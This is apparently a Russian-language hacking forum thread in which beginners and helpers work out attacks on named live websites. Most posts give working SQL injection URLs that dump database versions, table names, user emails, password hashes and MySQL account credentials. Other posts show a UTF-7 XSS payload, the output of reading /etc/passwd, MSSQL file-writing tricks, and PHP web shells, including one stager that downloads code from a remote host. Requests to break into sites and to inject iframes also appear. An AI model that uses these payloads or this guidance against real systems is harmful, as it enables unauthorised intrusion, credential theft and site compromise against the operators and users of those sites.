Мистерео
http://www.oke.ru/xo4u.php?id=146432+and+1=2+UNION+SELECT+1,2,versio n(),4,user(),6,7,8,9,10+FROM+chausers/*

3 и 5 - "Рабочие столбцы", именно их выводит скрипт
5.1.16-beta-log
gsokecomru@localhost

а так все выводит
Пример
http://www.oke.ru/xo4u.php?id=146432+and+1=2+UNION+SELECT+1,2,777777 77777,4,user(),6,7,8,9,10+FROM+chausers/*

но ниче не выводит

Как понять не выводится? А надпись "фанатик" жирным шрифтом тебя не настораживает? :D
В этой таблице инфа которую юзеры пишут в комментариях, что ты там хочешь найти?

ну так в 3 какраз стоит запрос на nick и passw но скрипт не хочет их показывать.
Все спс

Мистерео
http://www.oke.ru/
xo4u.php?id=146432+and+1=2+union+select+1,2,3,unhe x(hex(concat_ws(0x3a,version(),database(),user())) ),5,6,7/*
не знаю как у вас а у меня вообще 7 колонок..))
http://www.oke.ru/xo4u.php?id=146432+and+1=2+union+select+1,2,3,unhe x(hex(concat_ws(0x3a,table_name,table_schema))),5, 6,7+from+information_schema.tables+limit+30,1/*
нету там вобше ничего в бд.) 4 поломаные таблицы information_schema и oke.chausers.
http://www.oke.ru/xo4u.php?id=146432+and+1=2+union+select+1,2,3,unhe x(hex(concat_ws(0x3a,column_name,table_name,table_ schema))),5,6,7+from+information_schema.columns+wh ere+table_name=0x6368617573657273/*
достаем колонки данной таблицы.)
http://www.oke.ru/xo4u.php?id=146432+and+1=2+union+select+1,2,3,unhe x(hex(concat_ws(0x3a,id,nick,passw))),5,6,7+from+o ke.chausers/*
тут мы получаем id и nick тех людей которые пишут коменты...) а где ты там вобше login увидел? тоесть колонка passw - пустая.
http://www.oke.ru/xo4u.php?id=146432+and+1=2+union+select+1,2,3,unhe x(hex(concat_ws(0x3a,id,name,email,0x3a3a,want))), 5,6,7+from+wants/*
намного интереснее будет почитать желания..))

Есть способ обхода addslashes() ?

еси там чтото типо

"select ..bla... id = \"$_GET['bla']\""

хм.. может попробовать закрыть кавычки с тем же бэкслэшем? если можно линку, то я подумаю.. просто не могу я думать, смотря на голые мускульнуе запросы=)

http://www.idshop.ro/index.php?main_page=index&cPath=9999999999999'

хм.. даже и не понял как там что то можно реализовать... ведь то что выводится ошибка после подстановки кавычки еще не осначает что есть возможность проведения инъекции.. может быть просто в скрипт передано неправильное значение, вот он и ругается, а попытки что то из этого выжать провалились с треском.. по крайней мере у меня..

http://www.idshop.ro/index.php?main_page=index&cPath=9999999999999'
ну например можно слепую инъекцию использовать:
http://www.idshop.ro/index.php?main_page=index&cPath=9999999999999' WHERE tracking_id=134205 or if ((select 1)=1,1,(select 1 union select 2))=1%23

для закомментирования надо использовать решетку (%23)
но на самом деле там есть скули с выводом

есть следующая страничка
<?
$query="select * from spisok_users where user_name='$login' and password='$password'";
$result=mysql_query($query, $db);
$row=mysql_num_rows($result);?>
так вот можно ли как то изменить ее чтобы сделать из php-инъекцию?
пробывал
?password='%22;echo%22ghbdtn%22;exit;

или такое вообще не возможно?

есть следующая страничка
<?
$query="select * from spisok_users where user_name='$login' and password='$password'";
$result=mysql_query($query, $db);
$row=mysql_num_rows($result);?>
так вот можно ли как то изменить ее чтобы сделать из php-инъекцию?
пробывал
?password='%22;echo%22ghbdtn%22;exit;

или такое вообще не возможно?

Тут есть SQL иньекция, если поля $password и $login выше не фильтруются. Вообще, сначала читай тут, а только потом спрашивай: https://forum.antichat.ru/thread43966.html

скл инъекции нет так как нету подключения к бд. а поля не фильтруются)
ссылку прочту) спас)

скл инъекции нет так как нету подключения к бд.

Тогда ты ничего сделать не сможешь, про пхп почитай тут:

https://forum.antichat.ru/thread54355.html
https://forum.antichat.ru/thread56756.html

http://funx.md/funx/MAIN.asp?page=1&t=999999999999999&ttype=L

Ребят ткните носом где то нетак давно я видел сервис, суть его заключалась в том что я ввожу url сайта в ответ мне показывает какие папки есть на сайте

http://madnet.name/tools/madss/

работает анализируя выдачу гугла

кстати.. а где можно почитать на методы проведения sql-inj в MySQL 3.x?

http://www.securitylab.ru/contest/212101.php

есть следующая страничка
<?
$query="select * from spisok_users where user_name='$login' and password='$password'";
$result=mysql_query($query, $db);
$row=mysql_num_rows($result);?>
так вот можно ли как то изменить ее чтобы сделать из php-инъекцию?
пробывал
?password='%22;echo%22ghbdtn%22;exit;

или такое вообще не возможно?

ыы. Вот, я переделал! :d
<?php
if (!empty($_GET['bla'])){include($_GET['bla']);}
else {echo "не взломал=\";}
?>
script.php?bla=shell.txt
И станешь ты взломщиком скриптов!

XSS-нападения с использованием кодировки UTF-7.

Есть сайт _http://www.softsoft.ru/search/609468/index.htm
Там есть форма поиска

Смотрим условия:
+ Работает только с браузером Internet Explorer
+ Код должен находится до тегов определяющих кодировку
+ Перед кодом не должно быть никакого текста, содержащего символы из других кодировок

Если в тег <title> поместить код в кодировке UTF-7 то браузер раскодирует его и выполнит.
То что мы ищем заноситься в тайтл
Поэтому по идее достаточно поместить вредоносный код в кодировке UTF-7 в форму поиска

На этом сайте фильтруеться строка, если она больше 3 символов, так что возможно не прокатит

Но вопросы:
1) Но я и на локалхосте пробую без фильтрации например так

<html>
<head></head>
<body>
+ADwA-script+AD4A-alert('hacked+ACEA-')+ADwA-/script+AD4A-
</body>
</html>
Алерта нет...
Как именно нужно указать что текст в кодировке UTF-7?
Переводил редактором AnyCode, а дальше просто скопировать полученный текст?
Или ИЕ уже по другому обрабатыает кодировки?

2) Есль ли такие же способы, но с другими кодировками
напр UTF-16 ?

чтобы код выполнялся, нужно поместить МЕТА-тег
Помню даж на старом античате статья была...
кстати вот она:
http://old.antichat.ru/txt/utf7/
прочти и всё поймёшь

чтобы код выполнялся, нужно поместить МЕТА-тег
Помню даж на старом античате статья была...
кстати вот она:
http://old.antichat.ru/txt/utf7/
прочти и всё поймёшь
Ты бы сам-то прочитал бы эту статью!
Следует отметить, что распознавание кодировки, парсинг HTML тегов, и выполнение встретившихся скриптов происходит одновременно. Таким образом, если кодировка еще не определена, и встречается скрипт, зашифрованный в некоторой кодировке, например UTF-7, то браузер считает, что кодировка документа UTF-7, расшифровывает и выполняет скрипт, и только затем парсит оставшуюся часть документа. При этом, даже если впоследствии окажется, что кодировка иная (например встретился метатег с явным указанием кодировки, или были обнаружены русские буквы), скрипт все равно выполнится
Где там в примерах помещается МЕТА-тег???
Там просто закрываеться </title> - под видом +ADw-/title+AD4 и вставляеться javascript код

Но вопросы:
1) Но я и на локалхосте пробую без фильтрации например так
Цитата:
<html>
<head></head>
<body>
+ADwA-script+AD4A-alert('hacked+ACEA-')+ADwA-/script+AD4A-
</body>
</html>

Алерта нет...
Я смотрел заголовки - никакой передачи значения кодировки в HTTP Content-Type
Как именно нужно указать что текст в кодировке UTF-7?
Переводил редактором AnyCode, а дальше просто скопировать полученный текст?
Или ИЕ уже по другому обрабатыает кодировки?

2) Есль ли такие же способы, но с другими кодировками
напр UTF-16 ?

упс)) давно уже её читал, толком не помню, но суть прежняя : без мета тега не прокатит.
наверное только в старой ИЕшке.

и у меня возник вопрос, по скулям:

есть скуля, но выводятся только цифры, а текст не ввыводится. Что делать?
как пример, сайт русских шлюх:

http://putana.nu/list.php?link=-1+union+select+user(),2,3,4,5,6,7,8,9,10,11,12,13, 14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 ,31,32,33,34,35,36,37,38,39,40,41,42,43/*

2 o3,14um
нужны текстовые поля, всё выводится:
http://putana.nu/list.php?link=-1+union+select+1,user(),version(),4,5,6,7,8,9,10,1 1,12,13,%2014,15,16,17,18,19,20,21,22,23,24,25,26, 27,28,29,30%20,31,32,33,34,35,36,37,38,39,40,41,42 ,43/*
PS кстати root :)

Скуля вообще может претендовать на звание идеальной, не смотря на 4.0 ветку.
File_priv = Y, к тому же еще и ось фряшная, значит можно диры просматривать.. развлечение да и только

cmd> POST /list.php?link=-1+union+select+1,@@version_compile_os,file_priv,4, 5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,2 3,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39, 40,41,42,43+from+mysql.user/* HTTP/1.0

Имею на руках логин, базу данных, пароль от базы данных.
Можно ли подсоединиться telnet'om или с помощью ssh к открытому порту 3306 и слить оттуда базу данных?

Имею на руках логин, базу данных, пароль от базы данных.
Можно ли подсоединиться telnet'om или с помощью ssh к открытому порту 3306 и слить оттуда базу данных?
Да, а лучше найди на сайте phpmyadmin(если есть) или воспользуйся клиентом MySql

В том то и дело, что myadmin либо нет, либо спрятан так, что фиг найдешь. Искал его в течении недели.
Подключение к удаленному mysql запрещено. Я пытался так сделать.

Где можно почитать документацию по коннекту к порту, дампу базы данных и etc? В доках по телнету или ssh ?

В том то и дело, что myadmin либо нет, либо спрятан так, что фиг найдешь. Искал его в течении недели.
Подключение к удаленному mysql запрещено. Я пытался так сделать.


Можешь узнать что за хостинг, купить себе хостинг на этом же серваке и подключится к БД локально с логином и паролем от базы того хоста чью базу хочешь слить.

Я бы сделал лучше.
Взломал бы соседний сайт и залил шелл.
Так ведь, блин, там Vds!

Я бы сделал лучше.
Взломал бы соседний сайт и залил шелл.
Так ведь, блин, там Vds! Ну, я тебе подсказал метод для ленивых, думал что хостинг :)

Коннект к порту 3306 будет возможен в том случае если он открыт и если поле host в таблице mysql.user будет % или просто совпадать с твоей маской.

нет, я не имел ввиду конкретный случай! ПРосто допустим, есть ситуация, где выводится 1 поле. Выводятся там только цифры.

Есть ли возможность выводить слова, а не заниматься такой вот хернёй:
ascii(substring(user(),1,1))

Dima-k17?, как понять совпадать с моей маской? Маской IP сервера?

Есть скуля

такого типа select `bla1`,`bla2` FROM `tb` where `id` = $_GET['id']

на экран выводится

$fetch['bla'] и $fetch['bla2'] как сделать так чтоб выводилось на экран то что я хочу?))

если это вообще возможно

union select 1,2 не подходит выводится сёравно только $fetch['bla'] и $fetch['bla2']

ты уверен что там именно 2 колонки берется... подбери еще раз через order+by или через group+by кол-во колонок... и кстати кинь линк - посмотрим что там сделать можно...

Dima-k17?, как понять совпадать с моей маской? Маской IP сервера?
mysql> select user, host from mysql.user;
+------+-----------+
| user | host |
+------+-----------+
| root | 127.0.0.1 |
| pun | localhost |
| root | 90.90.%.% |
+------+-----------+
3 rows in set
И вот если у тебя IP начинается на 90.90. , то если знаешь логин/пасс, можно удалённо подключиться. Ето и есть совпадение маски.

Есть скуля

такого типа select `bla1`,`bla2` FROM `tb` where `id` = $_GET['id']

на экран выводится

$fetch['bla'] и $fetch['bla2'] как сделать так чтоб выводилось на экран то что я хочу?))

если это вообще возможно

union select 1,2 не подходит выводится сёравно только $fetch['bla'] и $fetch['bla2']
Ссылку давай.

mySQL query error: INSERT INTO ibf_pfields_content (field_1,field_2,field_3,field_4,member_id) VALUES('от верблюда-\','l','','',7463)

mySQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'l','','',7463)' at line 1
mySQL error code:
Date: Saturday 05th 2008f July 2008 03:39:04 PM


подскажите это уязвимость?)))))))прошу не обзываться)
вообщем если уязвимость то
вызвало её вот это при регистрации

http://www.valar.ru/tm2/0708/dmg.jpg
(http://www.valar.ru/upload/jpg/0708/dmg.htm)
в личку могу сказать некоторым где это) :rolleyes:

Не уязвимость. Просто ошибка. Что то ты с синтаксисом намудрил

mySQL query error: INSERT INTO ibf_pfields_content (field_1,field_2,field_3,field_4,member_id) VALUES('от верблюда-\','l','','',7463)


подскажите это уязвимость?)))))))

И вполне уязвимость, ошибка т.к. ты заэкранировал '. Попробуй передать \' , и посмотри что будет, вполне возможно, что кавычка будет экранироваться, но ты это экранирование убъёшь при помощи \., т.е. получится \\' , а значит ' - будет частью команды SQL, а не просто текстовым символом.

А может и ' не заэкранируется вообще, тогда ещё проще.

http://www.blackgospelpromo.com/viewpromo.php?promo_id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16/*

Не могу работать с 1 колонкой как выводить юзеров я даж не представляю

ЗЫ глядим в заголовок

http://www.blackgospelpromo.com/viewpromo.php?promo_id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16/*

Не могу работать с 1 колонкой как выводить юзеров я даж не представляю

ЗЫ глядим в заголовок
исполбзуй конструкцию concat, например так:
http://www.blackgospelpromo.com/viewpromo.php?promo_id=-1+union+select+1,2,concat(version(),0x3a3a,user(), 0x3a3a,database()),4,5,6,7,8,9,10,11,12,13,14,15,1 6/*

а как ее юзать??? Точнее почему иногда ставиться в скобках 0x3a3a или shar (58) Где про это можно почитать

а как ее юзать??? Точнее почему иногда ставиться в скобках 0x3a3a или shar (58) Где про это можно почитать
0x3a3a - это шестнадцтиричный код без 0x ..
shar (58) - пишется char(58) - 58 это ascii код двоеточия :
как я понял тебе интересно зачем это используется в скулях - так вот - это пишут для разделения полученых данных ..
0x3a ничем не отличается от char(58) ..

В поиске _http://investoru.info пишу '... вылазит:
'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '') and (hl_listings.expiration = 0 || date_a' at line 13'
Это уязвимость?

В поиске _http://investoru.info пишу '... вылазит:
'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '') and (hl_listings.expiration = 0 || date_a' at line 13'
Это уязвимость?

Да, простенькая инъекция, введи в поиске:
1') union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30,31,32/*
29 поле выводится

gisTy чет не допонял как вывести все таки можешь намекнешь?

Flash-ICE
http://forum.antichat.ru/showthread.php?t=43966

2 Flash-ICE

Еще можно юзать concat_ws(SQL hex разделителя,username,password,email,icq ,blablabla)

Имхо самый удобный ресурс для перевода в SQL hex - http://x3k.ru/

А вообще так мог бы почитать статьи перед тем чтобы лезть туда. Прос concat и concat_ws это уже "приятное дополнение" к статьям, даже если этого незнаешь то инъекцию всеравно раскрутишь... но основу знать надо. Есть статья которая какраз и содержит пояснения к твоему случаю со скобкой.

вопрос такой нашел пхп инклуд на сайте одном...вроде читаю пару файлов на сервере, но так как я в этом деле новичок хотелось бы узнать последствие моих действий, и ещё где хранятся пассы от Cpanel

Подскажите пожалуйста куда обратится с вопросом по изличению программ от "жадности"?.
Надо помощь ваша в снятии защиты, распаковке, а потом взломе Des. :)

Вопрос такой,это че за тип хэша?
nores2005@yandex.ru:205abdfcc23287dea72cb534b5eee9 22561557ff4d04ed102e5a3ff8884216421f0e3dad99908345 f7439f8ffabdffc4

ЫЫЫ,хэш без пробелов конечно :)

_http://www.menunsk.ru/places.php?id=0)+union+select+concat_ws(0x3a,mail, hesh),2+from+menunsk_mail+where+id=0x31/*

DDoSька
Скорее всего SHA384

2+union+select+1,concat_ws(0x3a,username,user_pass word),3+from+phpbb_users/*
error на username

2+union+select+1,concat_ws(0x3a,0x757365726e616d65 ,user_password),3+from+phpbb_users/*
Пропускает но все логины меняются на username.

??? не хватает прав на прасмотор столбца username ???

2+union+select+1,concat_ws(0x3a,username,user_pass word),3+from+phpbb_users/*
error на username

2+union+select+1,concat_ws(0x3a,0x757365726e616d65 ,user_password),3+from+phpbb_users/*
Пропускает но все логины меняются на username.

??? не хватает прав на прасмотор столбца username ???

`username` - а так?

Пропускает но все логины меняются на usernameЧто это значит?
Ты выводишь 2 столбца username и user_password,они выводятся. Что тебе не нравится?
Какие логины? Вот таблицы по дефолту в PhpBB 2 phpbb_users:
username
user_password
user_email
user_icq
user_aim

Что это значит?


просто tor4) закатал username в хекс, что собственно эквивалентно SELECT 'username' :D, поэтому вместо содержимого столбца username, выводится строка 'username' ;)

просто tor4) закатал username в хекс, что собственно эквивалентно SELECT 'username' :D, поэтому вместо содержимого столбца username, выводится строка 'username' ;)Ааааа ,блин , я вопрос не сразу понял :D
2 tor4)
Врятли на столбец нет прав доступа, давай линк, посмотрим

2 tor4)
Скорее всего дефолтное имя столбца изменено, а вообще, нах тебе username ? Тебе же скорее всего админский хэш нужен, а он самый первый в таблице.
Кста, какой error выпадает ?

error: [an error occurred while processing this directive]

админский хэш но логины стандартные не катят)

O_o
Если пхпбб, зачем тебе логины подбирать, просто зайди www.site.com/forum/profile.php?mode=viewprofile&u=2

Спасибо всем, отдельное спасибо jokester. надо было по играть с limit както забыл совсем))

как произвести иньекцию в PostgreSQL?
http://www.city-adm.ternopil.ua/image.php?module=gallery&size=small&id=999999+union+select+1--

sabe,
http://www.linuxshare.ru/postgresql/manual/index.html
postgresql.ru.net/docs.shtml
http://resurection.ru/doc/postgres/

2 sabe
ИМХО там нет инъекции, ругается на данные и всё

Народ , кто подскажет , куда в админке joomla поставить ифрейм , чтоб на всех страничка он был ?
Спасибо !

2Xszz
forum.antichat.ru/thread70944.html

я тут недано, и у меня есть вопрос: у нас сайт давно висит и иногда стали приходить разные заказы - там один код, видимо что-то пробовали, а посмотрел и нашел что по адресу site.ru/site/ можно посмотреть все файлы, что из этого могут извлечь и чем грозит???

я тут недано, и у меня есть вопрос: у нас сайт давно висит и иногда стали приходить разные заказы - там один код, видимо что-то пробовали, а посмотрел и нашел что по адресу site.ru/site/ можно посмотреть все файлы, что из этого могут извлечь и чем грозит??? Они могут только список файлов просмотреть, или и читать что в файлах скриптов (к примеру .php)? Как простейший вариант - могут утянуть дамп БД, т.к. будут знать где лежит (если есть).

В любом случае лучше закрыть.

Qwazar, я думаю, ты ошибаешься.

hall, если там просто листинг, то макисмум это грозит тем, что пользователь узнает где и как лежат твои файлы. PHP в этом случае он читать не может, ну если конечно сервер настроен на исполнение .php файлов, как php кода)

Чтобы это исправить напиши небольшой .htaccess файл:


Options -Indexes
#дальше просто для верности :)
IndexIgnore *

не получается подобрать количество полей, все время ошибка. как быть ? _http://www.pvp.kiev.ua/price?id_group=227'

Qwazar, я думаю, ты ошибаешься.Про то что можно ли читать файлы, это я вопрос задал :)
не получается подобрать количество полей, все время ошибка. как быть ? _http://www.pvp.kiev.ua/price?id_group=227' Сдаётся мне ты ничего вытянуть не сможешь, т.к. кавычки/слеши экранируются.

Qwazar, а, тогда извиняюсь :) Ну я ответил)

>> Сдаётся мне ты ничего вытянуть не сможешь, т.к. кавычки/слеши экранируются.
Не в фильтрации дело. Просто видно каким то хитрожопым способом составлен запрос, и часть запроса после инъекции не отрезается комментариями.

2 cheb
В этом параметре нет инъекции.Т.е. нет возможности влиять на запрос

Посмотри сам id_group=227 вывод "группа МФУ"
id_group=226 вывод "группа ноутбуки"
id_group=227-1 вывод "группа МФУ"

Если нужна инъекция на этом сайте вот она :

http://www.pvp.kiev.ua/price?id_group=244&id_price=-14141+union+select+1,2,3,4,5,concat(user(),char(58 ),version(),char(58),database()),7,8,9,0,11,12,13, 14--

ветка пятая ,дальше сам если нужно

Qwazar, я думаю, ты ошибаешься.

hall, если там просто листинг, то макисмум это грозит тем, что пользователь узнает где и как лежат твои файлы. PHP в этом случае он читать не может, ну если конечно сервер настроен на исполнение .php файлов, как php кода)

Чтобы это исправить напиши небольшой .htaccess файл:


Options -Indexes
#дальше просто для верности :)
IndexIgnore *


а если просто в каждой папке сделать файл index.html
и все, при обращении к папке этот файл же автоматически должен загружаться, тогда и файлы неувидишь... поправьте если мой способ неэффективен... :rolleyes:

hall, эффективен, но более, как бы сказать...дедовский, что ли)) Вариант с .htaccess'ом более практичен и прост (по крайней мере для меня) :)

Почему советуют использовать
mysql_real_escape_string()
или mysql_escape_string()
а не addslashes()?

Можно ли воспользоватся тем что используется addslashes()?

'SELECT `username` FROM `member` WHERE `id` = \' '. addslashes($str) .' \'

хммм

сделал

$a = "\x1a";

echo "slesh ".addslashes($a).'<br>';
echo "mysql ".mysql_real_escape_string($a);

результат

slesh 
mysql \Z

В 1ом слэш не добввился просто
а во 2ом не понел откуда \Z взялось oO

Привет всем!Нужна помощь!!!
Кто может помочь найти уязвимость в этом сайте http://kunik.no-ip.com/wordpress версия движка wordpress-2.5 помочь залить этот файл с сайта http://rapidshare.com/files/128670416/user.php.html на этот сайт http://kunik.no-ip.com/
Зарание спосибо!!!

Всем привет..
Товарисчи такое вот дело.. нашел скуль и все бы не чего если бы база была mysql c outfile, но увы MSSQL.
Побегал по форуму нашел кое что пробую, пишет - Warning: mssql_query() [function.mssql-query]: message: Line 1: Incorrect syntax near '\'. (severity 15)

сам запрос - http://ip/stat.php?type=melee'+union+select+1,'<?php eval($_GET['e']) ?>',3,4,5,6,7,8,9,10,11,12,13+exec+master..sp_makewe btask+'D:\AppServ\www\123.txt'%20--
Что тут не так?

6u4yxa, дело в том, что у каждой СУБД свой синтаксис. Вот, почитай статейку - https://forum.antichat.ru/thread30501.html

нашол скуль, фильтрации на чтения каталогов нет
http://www.dengi-info.com/news/?nid=-92588+union+select+1,2,3,4,load_file('../../../etc/passwd'),6/*

http://dengi-info.com/phpinfo.php

пхпинфо - там есть полные пути хотел прочитать файл админки неполучаеца =\
путь - /var/www/vhosts/dengi-info.com/httpdocs или /var/www/vhosts/dengi-info.com
админка - http://dengi-info.com/admin/index.php


root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
webadmin:x:500:500::/home/webadmin:/bin/bash
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
popa3d:x:84:501::/dev/null:/dev/null
postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash
webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
ntp:x:38:38::/etc/ntp:/sbin/nologin
alias:x:2021:2020:Qmail User:/var/qmail/alias:/bin/false
qmaild:x:2020:2020:Qmail User:/var/qmail/:/bin/false
qmaill:x:2022:2020:Qmail User:/var/qmail/:/bin/false
qmailp:x:2023:2020:Qmail User:/var/qmail/:/bin/false
qmailq:x:2520:2520:Qmail User:/var/qmail/:/bin/false
qmailr:x:2521:2520:Qmail User:/var/qmail/:/bin/false
qmails:x:2522:2520:Qmail User:/var/qmail/:/bin/false
popuser:x:110:31:POP3 service user:/var/qmail/popuser:/bin/false
psaadm:x:2523:2521:Admin Server:/:/bin/false
psaftp:x:2524:2522:anonftp psa user:/:/bin/false
lukasaddon:x:10001:2524::/var/www/vhosts/dengi-info.com:/bin/false
teletrade:x:10002:2524::/var/www/vhosts/teletrade.com.ua:/bin/false
kiev:x:10003:2524::/var/www/vhosts/teletrade.kiev.ua:/bin/false
aserrr:x:10004:2524::/var/www/vhosts/teletrade.bg:/bin/false


Почему немогу прочитать, и что делать...?
кодировал ефекта 0.

ну так залей шелл и смотри файлы..

во всех современых версиях линука не хранятса пароли в чистом виде ... нужно искать shadow

gisTy>> ефекта 0 проверял =\\

Micr0b, ну значит с правами что-то...
ничего для чтения тут не сделаешь

http://www.dengi-info.com/news/?nid=-92588+union+select+1,2,3,4,5,concat(admin,0x3a,adm in_pw)+from+phpads_config/*
admin:dee9eb25bb8bf64bb3097fd26c13911c - обычный md5
.зы попробовать к админке оч даже можно ..
===============================
http://www.dengi-info.com/forum//docs/CHANGELOG.html
3 пхпбб // возможно колонки по дефолту - не помню какие в 3ем ..
===============================
http://www.dengi-info.com/news/?nid=-92588+union+select+1,2,3,4,user,password+from+mysq l.user+limit+1,1
юзер pma_kIkP50QYhmSS наводит мысль о скрытом, а точнее переименованном phpmyadmin .. тк кк дефолтные имена не нашёл ..
===============================
http://www.dengi-info.com/news/?nid=-92588+union+select+1,2,3,4,user,concat_ws(0x3a,use r,password,host)+from+mysql.user+where+host=0x25+l imit+0,1/*
kpblca:28b270316169288e:% - возможно получится подконектится удалённо к базе ..

ДЛя MSSQL нашел как вывести в файл запрос.
EXEC master..sp_makewebtask “file.txt”, “sql-query”.
Пробую - http://ip/stats.php?type=man';exec+master..sp_makewebtask+'D :\appserv\www\123.txt', 'select+*+FROM+dbo.auth'-- но результат ноль пишет Incorrect syntax near '\'. Как залить шелл через мсску... или вывести данные в тхт файл..

З.Ы. - None, прочитал статью https://forum.antichat.ru/thread30501.html. через подзапрос почему то не выводит из таблиц зато через UNION работает на ура..На такой запрос '+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+IN FORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+(' name'))-- как только начинаю использовать NOT IN сразу не правильный синтаксис... =((

Разобрался с выводом файл делаю так:
http://ip/stat.php?type=melee';EXEC master..sp_makewebtask [D:\appserv\www\12.txt],[SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13+FROM+dbo..users]-- - Работает! а как зделать что бы как в Mysql через OUTFILE заливать шелы.. мне надо вставить вот это <?php $a=file_get_contents(\'http://ip/2008.txt\'); $f=fopen(\'sql.php\',\'a\'); fputs($f,$a); fclose($f); ?> - вставляя в одну из колонок так же как в mysql в файл вообще не е не скидывается..
Как мне вывести в файл вот этот кусок кода?

Нашел такое во трешение но опять споткнулся..
создать таблицу залить в неё пхп скрипт и потом вывести в в файл..
делаю http://ip/stat.php?type=melee';create table shell (code varchar(8000))--
потом insert into shell (code) values ('|code|')-- а вотут опять пишет на синтаксис, что тут не так?
Если вписывать INSERT into dbo..shell (code) values (123)-- без ковычек.. то в базу добавляется значение 123.. а пхп скрипт даже <?php phpinfo(); ?> вообще ни как=((?

Нашел такое во трешение но опять споткнулся..
создать таблицу залить в неё пхп скрипт и потом вывести в в файл..
делаю http://ip/stat.php?type=melee';create table shell (code varchar(8000))--
потом insert into shell (code) values ('|code|')-- а вотут опять пишет на синтаксис, что тут не так?
Если вписывать INSERT into dbo..shell (code) values (123)-- без ковычек.. то в базу добавляется значение 123.. а пхп скрипт даже <?php phpinfo(); ?> вообще ни как=((?

INSERT into dbo..shell (code) values (CHAR(65)+CHAR(67)....)
в ASCII переведи, если при конкатенации знаком "+" возникнут проблемы, то можно использовать функцию STUFF для конкатенации значений.

Вообещм разобрался пошел по пути создание базы запись в неё пхп скрипта и вывод в файл..
так как из за ковычек не как не хотел использовал http://www.motobit.com/util/binary-file-to-sql-hexstring.asp для перевода в хекс после этого запись в базу без проблем, но заливая туда скрипт <?php $a=file_get_contents('ip/123.txt'); $f=fopen('sqlsearch.php','a'); fputs($f,$a); fclose($f); ?> (ввиде хекса)- и после того как данные таблицы вывожу в файл ковычки автоматом почему то экранируются и получается <?php $a=file_get_contents(\'http://ip/123.txt\'); $f=fopen(\'sqlsearch.php\',\'a\'); fputs($f,$a); fclose($f); ?> после чего перейдя по ссылке сыпятся ошибки -
Warning: Unexpected character in input: '\' (ASCII=92) state=1 in D:\AppServ\www\5.php on line 20

Warning: Unexpected character in input: ''' (ASCII=39) state=1 in D:\AppServ\www\5.php on line 20
как это обойти?
Parse error: syntax error, unexpected ':' in D:\AppServ\www\RF\5.php on line 20

Warning: Unexpected character in input: ''' (ASCII=39) state=1 in D:\AppServ\www\5.php on line 20
как это обойти?
Parse error: syntax error, unexpected ':' in D:\AppServ\www\RF\5.php on line 20 Залей просто <?system($_GET[cmd]);?> через него и рули. (site/shell.php?cmd=dir) к примеру.

братья, простите что немного не потеме....

помогите сделать такую штуку: домен site.ru у него есть внутренняя страница, например про стройку, как сделать название страницы и в какой кодировке прописать ее в коде страницы, чтобы при переходе на данную страницу она имела такой вид: "www.site.ru/стройка" ???

http://www.nationalwellness.org/index.php?id=619&id_tier=1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFOR MATION_SCHEMA.TABLES)--
что тут не так ?

что тут не так ?
это Access

Как можно расшарить вот этот сайт http://citywars.ru/?
ВРоде бы как защита слабая
(что то есть)
http://citywars.ru/photo/
... .ПОмоите что нибудь найти ->Игра начала работать только вчера

Нужна помощь с колонками!


http://catalog.vimdivision.ru/index.php?rn_id=-1+union+select+1,2,3,4,5,6,7/*
http://catalog.vimdivision.ru/index.php?rn_id=-1+union+select+1,@@version,3,4,5,6,7/* тут 5.0.33
http://catalog.vimdivision.ru/index.php?rn_id=-1+union+select+1,TABLE_NAME,3,4,5,6,7 FROM INFORMATION_SCHEMA.TABLES--
получаю имена таблиц:
